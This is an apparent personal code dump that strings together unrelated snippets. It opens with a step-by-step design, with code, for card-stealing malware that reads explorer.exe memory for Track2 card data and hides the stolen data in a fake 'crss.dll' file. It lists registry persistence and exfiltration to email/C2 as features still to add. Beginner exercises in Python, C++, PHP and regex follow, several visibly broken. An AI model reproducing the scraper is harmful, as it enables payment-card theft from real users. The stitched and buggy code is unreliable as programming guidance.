Malware Analysis: Dump Scraper Implementation in Python Using winappdbg, getpass, re, sys

Method of Operation of Scanning explorer.exe for Dump Data:
(1) Show the Windows version and the current architecture (from winappdbg (System.os, System.arch, System.bits))
(2) Create a snapshot of running processes (from winappdbg.System (request_debug_privileges(), scan_processes())
(3) Obtain local username (from getpass.getuser())
(4) Create a writeable file in Application Data
Dump_Writer = open('C:\\Documents and Settings\\'+UserName+'\\Application Data\\\\crss.dll', 'w+')
(5) Obtain all processes that match the requested filenames.
# Elevate privileges
system.request_debug_privileges()
system.scan_processes()
for process, filename in system.find_processes_by_filename("explorer.exe"):
    pid = process.get_pid()
    bits = process.get_bits()
    print pid, bits
(6) Get a memory map of the process.
memoryMap  = process.get_memory_map()
mappedFilenames = process.get_mapped_filenames(memoryMap)
(7) For each memory block in the map read address and size of memory blocks, its state (free or allocated), page protection bits (looking for win32.MEM_COMMIT), and its memory type
(8) Read the data from memory if mbi.has_content() and mbi.State == win32.MEM_COMMIT
Data = process.read(BaseAddress, RegionSize)
(9) Implement a simple Regular Expression looking for Track2 data
Dump_Regex = re.findall(r'%B\d{0,19}\^[\w\s\/]{2,26}\^\d{7}\w*\?', Data)
Dump_Data.append(Dump_Regex)
(10) Beatufy the extracted dump data
(11) Write dump data into crss.dll

Missing features are as follows:
(1) Add Registry Persistence
(2) Encode Saved Data
(3) Add Luhn Algorithm
(4) Create a process for this algorithm
(5) Send data to email/C2

#!/usr/bin/env python
​#_author = vkremez

# This is an assignment for University of Michigan course on "Using Python to Access Web Data."


# This Python program will allow us to scrape the content of a website for any URLs. 

# Here is the algorithm:
'''
The program will use urllib to (1) read the HTML from the website data, (2) extract the href= values from the anchor tags, (3) scan for a tag that is in a particular position relative to the first name in the list, (4) follow that link and repeat the process a number of times and report the results.
'''
import os
import argparse
import urllib
from datetime import datetime
from bs4 import *

print os.system('echo WEB SCRAPER 1.0')
print datetime.datetime.now()

url = raw_input('Enter URL: ')
html = urllib.urlopen(url).read()

soup = BeautifulSoup(html)
tags = soup('a')

count = int(raw_input('Enter count: '))
position = int(raw_input('Enter position: '))

print "Retrieving: " + url
print "Retrieving: " + tags[position-1].get('href', None)

for x in range(0,count-1):
  html = urllib.urlopen(tags[position-1].get('href',None)).read()
  soup = BeautifulSoup(html) tags = soup('a')
 print "Retrieving: " + tags[position-1].get('href', None)

parser = argparse.ArgumentParser(description='Web Scraper 1.0 by VK.')
parser.add_argument('string', metavar='www', type=int, nargs='+', help='http://website.com format')
args = parser.parse_args()
print(args.accumulate(args.integers))

SOURCE: http://code.tutsplus.com/tutorials/8-regular-expressions-you-should-know--net-6149

1. Matching a Username
Pattern: /^[a-z0-9_-]{3,16}$/

A. String that matches: my-us3r_n4m3
B. String that doesn't match: th1s1s-wayt00_l0ngt0beausername (too long)

2. Matching a Password
Pattern: /^[a-z0-9_-]{6,18}$/

A. String that matches: myp4ssw0rd
B. String that doesn't match: mypa$$w0rd (contains a dollar sign)

3. Matching a Hex Value
Pattern: /^#?([a-f0-9]{6}|[a-f0-9]{3})$/

A. String that matches: #a3c113B.
B. String that doesn't match:#4d82h4 (contains the letter h)

4. Matching a Slug
Pattern: /^[a-z0-9-]+$/

A. String that matches: my-title-here
B. String that doesn't match:​ my_title_here (contains underscores)

5. Matching an Email
Pattern: /^([a-z0-9_\.-]+)@([\da-z\.-]+)\.([a-z\.]{2,6})$/

A. String that matches:john@doe.com
B. String that doesn't match:
john@doe.something (TLD is too long)

6. Matching a URL
Pattern:/^(https?:\/\/)?([\da-z\.-]+)\.([a-z\.]{2,6})([\/\w \.-]*)*\/?$/

A. String that matches:http://net.tutsplus.com/about
B. String that doesn't match:http://google.com/some/file!.html (contains an exclamation point)

7. Matching an IP Address
Pattern: /^(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)$/


8. Matching an HTML Tag
Pattern:/^<([a-z]+)([^<]+)*(?:>(.*)<\/\1>|\s+\/>)$/

A. String that matches:<a href="http://net.tutsplus.com/">Nettuts+</a>
B. String that doesn't match:<img src="img.jpg" alt="My image>" /> (attributes can't contain greater than signs)

// Reminder

#include <iostream>

using namespace std;




int main(){

    int a[5][5],b[5][5],c[5][5],m,n,p,q,i,j,k;

    cout<<"Enter rows and columns of your first matrix: ";

    cin>>m>>n;

    cout<<"Enter rows and columns of your second matrix: ";

    cin>>p>>q;

    if(n==p){

        cout << "\nEnter your first matrix:\n";

        for (i=0; i<m; ++i);

        for (j=0; j<n; ++j);

        cin>>a[i][j];

        cout<<"\nEnter your second matrix:\n";

        for (i=0; i<p; ++i);

        for (j=0; j<q; ++j);

        cin >> b[i][j];

        cout << "\nThe new matrix is: \n";

        for (i=0; i<m; ++i){

            for(j=0; j<q; ++j)

                c[i][j]=0;

            for(k=0; k<n; ++k);

                c[i][j] = c[i][j] + (a[i][k]*b[k][j]);

            cout<<c[i][j]<<"\t";

        }

        cout<<"\n";

    }

else

    cout<<"\nMatrix multiplication can't be done";

return 0;

# Regular Expressions

Identifiers:
\d Any number 
\D Anything but a number
\s Space
\S Anything but a space
\w Any character
\W Anything but a character
. Any character except for a new line
\b Whitespace around words
\. A period

Modifiers:
{1,3} We are expecting 1-3
+ Match 1 or more
? Match 0 or 1
* Match 0 or more
$ Match the end of a string
^ Match the beginning of a string
| Either or E.g. \d{1-3}|\w {5-6}
[] Range or "variance" [A-Z] or [A-Za-z] [1-5a-qA-Z]
{x} Expecting "x" amount

White Space Characters:
\n New line
\t Tab
\s Space
\f Form
\e Escape
\r Return

DON'T FORGET! . + * ? [ ] $ ^ ( ) { } | \

PHP is an object-oriented programming language, which means that you can create objects, which can contain variables and functions.

<!DOCTYPE html>
<html>
    <head>
      <title> Introduction to Object-Oriented Programming </title>
      <link 'text/css' rel='stylesheet' href='style.css'/>
    </head>
            <body>
      <p>
      <?php

        // The code below creates the class

        class Person {

            // Creating some properties (variables tied to an object)

            public $isAlive = true;
            public $firstname;
            public $lastname;
            public $age;
    
            // Assigning the values

            public function __construct($firstname, $lastname, $age) {
              $this->firstname = $firstname;
              $this->lastname = $lastname;
              $this->age = $age;
            }

            // Creating a method (function tied to an object)

            public function greet() {
              return "Hello, my name is " . $this->firstname . " " . $this->lastname . ". Nice to meet you! :-)";
            }
          }

        // Creating a new person called "excellent 12345", who is 12345 years old ;-)
        $me = new Person('excellent', '12345', 12345);

        // Printing out, what the greet method returns

        echo $me->greet();
        ?>
        </p>
    </body>
</html>

#include <iostream>
#include <cmath>

using namespace std;

int main(void) {
        float value, square_root;

        cout << "Enter your number now: " << endl;
        cin >> value;
        if(value >= 0.0) {
            square_root = sqrtf(value);
            cout << "You have entered: " << value << endl;
            cout << "Your square root is: " << squareroot << endl;
        }
        return 0;
}

#!/usr/bin/env python

# Fitness Calculator
# Coded By Vitali

from datetime import datetime
now = datetime.now()
print "%s/%s/%s %s:%s:%s" % (now.month,now.day,now.year,now.hour, now.minute,now.second)
print "Welcome to Fitness Calculator!"

name = raw_input("Please Enter Your First and Last Name:")

exercise = input("How many calories have you burned today?")
meal = input("How many calories have you consumed today?")
goal = input("How many calories would you like to cut per day?")

total = exercise - meal

print "Good day%s, so your difference is %s calories, your goal is %s calories, and your meal is %s calories." % (name, total, goal, meal)

print "Thank you for using this Fitness Calculator!"
print "Please leave us your feedback!"

def feedback():
    print "This is the feedback zone!"    
answer = input("How do you rate it from 1 to 10?")
if answer < 6:
    print "Thank you! We will do my best to improve this application in future!"
else:
    print "Thank you! We are glad that you have enjoyed using this application!"